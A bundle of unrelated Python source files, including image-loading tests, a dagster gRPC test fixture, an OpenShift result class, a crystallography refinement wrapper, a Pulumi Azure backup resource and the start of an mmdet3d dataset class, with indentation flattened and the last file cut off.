['docker-compose', '-f', docker_compose_file, 'rm', '-f', service_name], env=env,
)
except Exception: # pylint: disable=broad-except
pass
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'up', '-d', service_name], env=env,
)
yield
@pytest.fixture(scope='session')
def grpc_host():
# In buildkite we get the ip address from this variable (see buildkite code for commentary)
# Otherwise assume local development and assume localhost
env_name = 'GRPC_SERVER_HOST'
if env_name not in os.environ:
os.environ[env_name] = 'localhost'
return os.environ[env_name]
@pytest.fixture(scope='session')
def grpc_port():
yield HARDCODED_PORT
@pytest.fixture(scope='session')
def docker_grpc_client(
dagster_docker_image, grpc_host, grpc_port
): # pylint: disable=redefined-outer-name, unused-argument
if not IS_BUILDKITE:
docker_service_up(file_relative_path(__file__, 'docker-compose.yml'), 'dagster-grpc-server')
wait_for_connection(grpc_host, grpc_port)
yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
|
import io
import resource
from pathlib import Path
import numpy as np
import PIL
import pytest
from keras_preprocessing.image import utils
def test_validate_filename(tmpdir):
valid_extensions = ('png', 'jpg')
filename = tmpdir.ensure('test.png')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.PnG')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.some_extension')
assert not utils.validate_filename(str(filename), valid_extensions)
assert not utils.validate_filename('some_test_file.png', valid_extensions)
def test_load_img(tmpdir):
filename_rgb = str(tmpdir / 'rgb_utils.png')
filename_rgba = str(tmpdir / 'rgba_utils.png')
filename_grayscale_8bit = str(tmpdir / 'grayscale_8bit_utils.png')
filename_grayscale_16bit = str(tmpdir / 'grayscale_16bit_utils.tiff')
filename_grayscale_32bit = str(tmpdir / 'grayscale_32bit_utils.tiff')
original_rgb_array = np.array(255 * np.random.rand(100, 100, 3),
dtype=np.uint8)
original_rgb = utils.array_to_img(original_rgb_array, scale=False)
original_rgb.save(filename_rgb)
original_rgba_array = np.array(255 * np.random.rand(100, 100, 4),
dtype=np.uint8)
original_rgba = utils.array_to_img(original_rgba_array, scale=False)
original_rgba.save(filename_rgba)
original_grayscale_8bit_array = np.array(255 * np.random.rand(100, 100, 1),
dtype=np.uint8)
original_grayscale_8bit = utils.array_to_img(original_grayscale_8bit_array,
scale=False)
original_grayscale_8bit.save(filename_grayscale_8bit)
original_grayscale_16bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int16
)
original_grayscale_16bit = utils.array_to_img(original_grayscale_16bit_array,
scale=False, dtype='int16')
original_grayscale_16bit.save(filename_grayscale_16bit)
original_grayscale_32bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int32
)
original_grayscale_32bit = utils.array_to_img(original_grayscale_32bit_array,
scale=False, dtype='int32')
original_grayscale_32bit.save(filename_grayscale_32bit)
# Test that loaded image is exactly equal to original.
loaded_im = utils.load_img(filename_rgb)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgb_array.shape[0],
original_rgb_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
# test casting int16 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# test casting int32 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_32bit_array)
# Test that nothing is changed when target size is equal to original.
loaded_im = utils.load_img(filename_rgb, target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgba_array.shape[0],
original_rgba_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Test down-sampling with bilinear interpolation.
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 4)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test down-sampling with nearest neighbor interpolation.
loaded_im_nearest = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 3)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im_nearest = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 4)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test different path type
with open(filename_grayscale_32bit, 'rb') as f:
_path = io.BytesIO(f.read()) # io.Bytesio
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit # str
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit.encode() # bytes
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = Path(tmpdir / 'grayscale_32bit_utils.tiff') # Path
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Check that exception is raised if interpolation not supported.
loaded_im = utils.load_img(filename_rgb, interpolation="unsupported")
with pytest.raises(ValueError):
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="unsupported")
# Check that the aspect ratio of a square is the same
filename_red_square = str(tmpdir / 'red_square_utils.png')
A = np.zeros((50, 100, 3), dtype=np.uint8) # rectangle image 100x50
A[20:30, 45:55, 0] = 255 # red square 10x10
red_square_array = np.array(A)
red_square = utils.array_to_img(red_square_array, scale=False)
red_square.save(filename_red_square)
loaded_im = utils.load_img(filename_red_square, target_size=(25, 25),
keep_aspect_ratio=True)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
red_channel_arr = loaded_im_array[:, :, 0].astype(np.bool)
square_width = np.sum(np.sum(red_channel_arr, axis=0))
square_height = np.sum(np.sum(red_channel_arr, axis=1))
aspect_ratio_result = square_width / square_height
# original square had 1:1 ratio
assert aspect_ratio_result == pytest.approx(1.0)
def test_list_pictures(tmpdir):
filenames = ['test.png', 'test0.jpg', 'test-1.jpeg', '2test.bmp',
'2-test.ppm', '3.png', '1.jpeg', 'test.bmp', 'test0.ppm',
'test4.tiff', '5-test.tif', 'test.txt', 'foo.csv',
'face.gif', 'bar.txt']
subdirs = ['', 'subdir1', 'subdir2']
filenames = [tmpdir.ensure(subdir, f) for subdir in subdirs
for f in filenames]
found_images = utils.list_pictures(str(tmpdir))
assert len(found_images) == 33
found_images = utils.list_pictures(str(tmpdir), ext='png')
assert len(found_images) == 6
def test_array_to_img_and_img_to_array():
height, width = 10, 8
# Test the data format
# Test RGB 3D
x = np.random.random((3, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (3, height, width)
# Test RGBA 3D
x = np.random.random((4, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (4, height, width)
# Test 2D
x = np.random.random((1, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (1, height, width)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# Test tf data format
# Test RGB 3D
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 3)
# Test RGBA 3D
x = np.random.random((height, width, 4))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 4)
# Test 2D
x = np.random.random((height, width, 1))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 16-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int16
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# Test invalid use case
with pytest.raises(ValueError):
x = np.random.random((height, width)) # not 3D
img = utils.array_to_img(x, data_format='channels_first')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.array_to_img(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5))
img = utils.array_to_img(x, data_format='channels_last')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.img_to_array(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5, 3))
img = utils.img_to_array(x, data_format='channels_last')
def write_sample_image(tmpdir):
im = utils.array_to_img(np.random.rand(1, 1, 3))
path = str(tmpdir / 'sample_image.png')
utils.save_img(path, im)
return path
def test_image_file_handlers_close(tmpdir):
path = write_sample_image(tmpdir)
max_open_files, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
for i in range(max_open_files+1):
utils.load_img(path)
def test_load_img_returns_image(tmpdir):
path = write_sample_image(tmpdir)
im = utils.load_img(path)
assert isinstance(im, PIL.Image.Image)
if __name__ == '__main__':
pytest.main([__file__])
|
"""This module contains unit tests for stream module."""
import pytest
import pseudo
__author__ = "Patryk Niedźwiedziński"
@pytest.fixture
def stream():
"""Returns stream object"""
def _s(i):
s = pseudo.stream.Stream(i)
return s
return _s
@pytest.mark.timeout(2)
def test_get_current_line(stream, test):
s = stream("a\nb")
test(s.get_current_line(), "a")
s.line += 1
test(s.get_current_line(), "b")
@pytest.mark.timeout(2)
def test_next_line(stream):
"""Checks Stream.next_line"""
s = stream("1\n2")
s.next_line()
if "2" != s.peek():
print(s.peek())
raise AssertionError
@pytest.mark.timeout(2)
def test_next(stream):
"""Checks Stream.next"""
s = stream("1\n")
if "1" != s.next():
print(s.next())
raise AssertionError
@pytest.mark.timeout(2)
def test_eol(stream):
"""Checks Stream.eol"""
s = stream("\n1\n")
if not s.eol():
raise AssertionError
s.next_line()
if s.eol():
raise AssertionError
s.next()
if not s.eol():
raise AssertionError
@pytest.mark.timeout(2)
def test_eof(stream):
"""Checks Stream.eof"""
s = stream("1")
if s.eof():
raise AssertionError
s.next()
if not s.eof():
raise AssertionError
@pytest.mark.timeout(2)
def test_throw(stream):
"""Checks Stream.throw"""
s = stream("test")
try:
s.throw("Error")
except SystemExit:
pass
else:
raise AssertionError
|
from __future__ import absolute_import
import json
from .model import OpenShiftPythonException
class Result(object):
def __init__(self, high_level_operation, tracking_limit=None):
self.high_level_operation = high_level_operation
self.__actions = []
# if tracking_limit is less than 0 that means unlimited tracking_limit
if tracking_limit is not None and tracking_limit >= 0:
self.limit_tracking_actions = tracking_limit
else:
self.limit_tracking_actions = None
def actions(self):
my_list = [a for a in self.__actions if not a.internal]
return my_list
# Returns a bitwise OR of all underlying action statuses (if 0, all actions returned 0)
def status(self):
s = 0
for action in self.__actions:
# If not the last attempt, return status does not matter; errors ignored.
if action.last_attempt:
s |= int(action.status)
return s
# Returns aggregate stdout from all underlying actions
def out(self):
s = u''
for action in self.__actions:
if action.out:
s += action.out
if not s.endswith("\n"):
s += u'\n'
return s
def get_timeout(self):
"""
:return: Iterates through all actions in this Result and returns the first Action object
it finds that indicates it timed out. If no action timed out, returns None.
"""
for action in self.__actions:
if action.timeout:
return action
return None
# Returns aggregate stderr from all underlying actions
def err(self):
s = u''
for action in self.__actions:
if action.err:
s += action.err
if not s.endswith("\n"):
s += u'\n'
return s
def as_dict(self, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
m = {
"operation": self.high_level_operation,
"status": self.status(),
"actions": [action.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references,
redact_streams=redact_streams) for action in self.__actions]
}
return m
def as_json(self, indent=4, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
return json.dumps(
self.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references, redact_streams=redact_streams),
indent=indent)
def add_action(self, action):
self.__actions.append(action)
if self.limit_tracking_actions is not None and len(self.__actions) > self.limit_tracking_actions:
self.__actions.pop(0)
def add_result(self, result):
self.__actions.extend(result.__actions)
def __repr__(self):
return self.as_json()
def fail_if(self, msg):
if self.get_timeout():
msg += " (Timeout during: {})".format(self.get_timeout().as_dict()['cmd'])
if self.status() != 0:
raise OpenShiftPythonException(msg, self)
|
#!/usr/bin/env ccp4-python
"""Module to run sheetbend on a model"""
__author__ = "Adam Simpkin"
__date__ = "05 Aug 2018"
__version__ = "1.0"
import os
from simbad.util import mtz_util
from simbad.mr.refmac_refine import Refmac
from pyjob import cexec
class SheetBend(object):
"""Class to run sheetbend"""
def __init__(self, hklin, hklout, logfile, pdbin, pdbout, work_dir):
self._hklin = None
self._hklout = None
self._logfile = None
self._pdbout = None
self._pdbout = None
self._work_dir = None
# Temporary path for testing
self.exe = "/data1/opt/devtoolsTrunk/install/bin/csheetbend"
self.hklin = hklin
self.hklout = hklout
self.logfile = logfile
self.pdbin = pdbin
self.pdbout = pdbout
self.work_dir = work_dir
self.check_sheetbend_exe()
@property
def hklin(self):
"""The input hkl file"""
return self._hklin
@hklin.setter
def hklin(self, hklin):
"""Define the input hkl file"""
self._hklin = hklin
@property
def hklout(self):
"""The output hkl file"""
return self._hklout
@hklout.setter
def hklout(self, hklout):
"""Define the output hkl file"""
self._hklout = hklout
@property
def logfile(self):
"""The logfile output"""
return self._logfile
@logfile.setter
def logfile(self, logfile):
"""Define the output logfile"""
self._logfile = logfile
@property
def pdbin(self):
"""The input pdb file"""
return self._pdbin
@pdbin.setter
def pdbin(self, pdbin):
"""Define the input pdb file"""
self._pdbin = pdbin
@property
def pdbout(self):
"""The output pdb file"""
return self._pdbout
@pdbout.setter
def pdbout(self, pdbout):
"""Define the output pdb file"""
self._pdbout = pdbout
@property
def work_dir(self):
"""The path to the working directory"""
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
"""Define the working directory"""
self._work_dir = work_dir
def check_sheetbend_exe(self):
if not os.path.isfile(self.exe):
msg = "Sheetbend executable {0} not found".format(self.exe)
raise RuntimeError(msg)
def run(self, ncyc=100):
# Make a note of the current working directory
current_work_dir = os.getcwd()
# Change to the sheetbend working directory
if os.path.exists(self.work_dir):
os.chdir(self.work_dir)
else:
os.makedirs(self.work_dir)
os.chdir(self.work_dir)
tmp_pdb = os.path.join(self.work_dir, "sheetbend.pdb")
SheetBend.sheetbend(self.exe, self.hklin, self.pdbin, tmp_pdb, ncyc, self.logfile)
# Perform a cycle of Refmac to get output hkl
key = "ncyc 10"
Refmac.refmac(self.hklin, self.hklout, tmp_pdb, self.pdbout, self.logfile, key)
# Return to original working directory
os.chdir(current_work_dir)
@staticmethod
def sheetbend(exe, hklin, pdbin, pdbout, ncyc, logfile):
"""Function to run refinement using sheetbend
Parameters
----------
hklin : str
Path to the input hkl file
pdbin : str
Path to the input pdb
pdbout : str
Path to the output pdb
ncyc : int
Number of cycles to run
logfile : str
Path to the output log
Returns
-------
file
Output pdb file
file
Output log file
"""
mtz_labels = mtz_util.GetLabels(hklin)
colin = "{0},{1}".format(mtz_labels.f, mtz_labels.sigf)
cmd = [exe, "--pdbin", pdbin, "--mtzin", hklin, "--pdbout", pdbout, "--colin-fo", colin, "-cycles", str(ncyc), "-resolution-by-cycle", "6,3"]
stdout = cexec(cmd)
with open(logfile, "w") as f_out:
f_out.write(stdout)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Runs refinement using sheetbend", prefix_chars="-")
group = parser.add_argument_group()
group.add_argument("-hklin", type=str, help="Path the input hkl file")
group.add_argument("-hklout", type=str, help="Path the output hkl file")
group.add_argument("-logfile", type=str, help="Path to the output log file")
group.add_argument("-ncyc", type=int, default=12, help="Number of cycles of refinement to run")
group.add_argument("-pdbin", type=str, help="Path to the input pdb file")
group.add_argument("-pdbout", type=str, help="Path to the output pdb file")
group.add_argument("-work_dir", type=str, help="Path to the working directory")
args = parser.parse_args()
sheetbend = SheetBend(args.hklin, args.hklout, args.logfile, args.pdbin, args.pdbout, args.work_dir)
sheetbend.run(args.ncyc)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['WebAppBackupConfigurationSlot']
class WebAppBackupConfigurationSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup_name: Optional[pulumi.Input[str]] = None,
backup_schedule: Optional[pulumi.Input[pulumi.InputType['BackupScheduleArgs']]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
storage_account_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Description of a backup which will be performed.
API Version: 2020-10-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backup_name: Name of the backup.
:param pulumi.Input[pulumi.InputType['BackupScheduleArgs']] backup_schedule: Schedule for the backup if it is executed periodically.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]] databases: Databases included in the backup.
:param pulumi.Input[bool] enabled: True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of the app.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] slot: Name of the deployment slot. If a slot is not specified, the API will update the backup configuration for the production slot.
:param pulumi.Input[str] storage_account_url: SAS URL to the container.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backup_name'] = backup_name
__props__['backup_schedule'] = backup_schedule
__props__['databases'] = databases
__props__['enabled'] = enabled
__props__['kind'] = kind
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
if storage_account_url is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_url'")
__props__['storage_account_url'] = storage_account_url
__props__['system_data'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web/latest:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20190801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppBackupConfigurationSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppBackupConfigurationSlot, __self__).__init__(
'azure-nextgen:web:WebAppBackupConfigurationSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppBackupConfigurationSlot':
"""
Get an existing WebAppBackupConfigurationSlot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppBackupConfigurationSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the backup.
"""
return pulumi.get(self, "backup_name")
@property
@pulumi.getter(name="backupSchedule")
def backup_schedule(self) -> pulumi.Output[Optional['outputs.BackupScheduleResponse']]:
"""
Schedule for the backup if it is executed periodically.
"""
return pulumi.get(self, "backup_schedule")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseBackupSettingResponse']]]:
"""
Databases included in the backup.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageAccountUrl")
def storage_account_url(self) -> pulumi.Output[str]:
"""
SAS URL to the container.
"""
return pulumi.get(self, "storage_account_url")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
from __future__ import absolute_import
from pex.platforms import *
|
import numpy as np
from os import path as osp
from mmdet3d.core import show_result, show_seg_result
from mmdet3d.core.bbox import DepthInstance3DBoxes
from mmdet.datasets import DATASETS
from mmseg.datasets import DATASETS as SEG_DATASETS
from .custom_3d import Custom3DDataset
from .custom_3d_seg import Custom3DSegDataset
from .pipelines import Compose
@DATASETS.register_module()
class S3DISDataset(Custom3DDataset):
"""S3DIS Dataset for Detection Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one. The one for
test is Area_5 as suggested in `GSDN <https://arxiv.org/abs/2006.12356>`_.
To concatenate 5 areas during training
`mmdet.datasets.dataset_wrappers.ConcatDataset` should be used.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
Based on the `box_type_3d`, the dataset will encapsulate the box
to its original format then converted them to `box_type_3d`.
Defaults to 'Depth' in this dataset. Available options includes
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
"""
CLASSES = ('table', 'chair', 'sofa', 'bookcase', 'board')
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
modality=None,
box_type_3d='Depth',
filter_empty_gt=True,
test_mode=False):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`DepthInstance3DBoxes`): \
3D ground truth bboxes
- gt_labels_3d (np.ndarray): Labels of ground truths.
- pts_instance_mask_path (str): Path of instance masks.
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
if info['annos']['gt_num'] != 0:
gt_bboxes_3d = info['annos']['gt_boxes_upright_depth'].astype(
